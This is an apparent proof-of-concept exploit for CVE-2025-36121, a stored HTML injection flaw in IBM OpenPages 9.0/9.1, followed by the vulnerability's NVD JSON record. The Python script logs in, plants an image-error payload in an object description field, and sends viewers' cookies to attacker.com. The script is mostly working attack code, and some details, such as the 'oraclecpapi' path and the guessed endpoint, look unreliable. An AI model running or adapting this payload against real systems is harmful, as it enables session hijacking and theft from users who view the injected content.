CVE-2025-36121

import requests import json # CVE-2025-36121 PoC - IBM OpenPages HTML Injection # Target: IBM OpenPages 9.0/9.1 # Attack Type: Stored HTML Injection TARGET_URL = "https://vulnerable-server:9443/oraclecpapi" USERNAME = "attacker_account" PASSWORD = "attacker_password" # Malicious HTML/JavaScript payload PAYLOAD = '''<img src=x onerror="this.src='https://attacker.com/log?c='+document.cookie">''' def login(): """Authenticate and obtain session token""" session = requests.Session() login_url = f"{TARGET_URL}/auth/login" data = {"username": USERNAME, "password": PASSWORD} response = session.post(login_url, json=data, verify=False) if response.status_code == 200: return session return None def inject_html(session): """Inject malicious HTML into vulnerable field""" # Target endpoint varies based on application configuration inject_url = f"{TARGET_URL}/api/v1/objects/create" headers = {"Content-Type": "application/json"} data = { "objectType": "observation", "description": PAYLOAD, # Vulnerable field "category": "risk" } response = session.post(inject_url, json=data, headers=headers, verify=False) return response.status_code == 200 def main(): print("CVE-2025-36121 PoC - IBM OpenPages HTML Injection") session = login() if session: if inject_html(session): print("[+] HTML injection successful!") print("[*] Payload stored. Victims viewing this content will trigger the payload.") else: print("[-] Injection failed.") else: print("[-] Authentication failed.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-36121", "sourceIdentifier": "[email protected]", "published": "2025-10-27T15:15:38.473", "lastModified": "2025-11-03T17:26:22.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM OpenPages 9.1 and 9.0 is vulnerable to HTML injection. A remotely authenticated attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8ACBB76-355D-43F6-851E-0B79EE52AC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:openpages:9.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F78E4CFE-31E7-4FFF-8DB4-6D7AC69A2248"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7248932", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}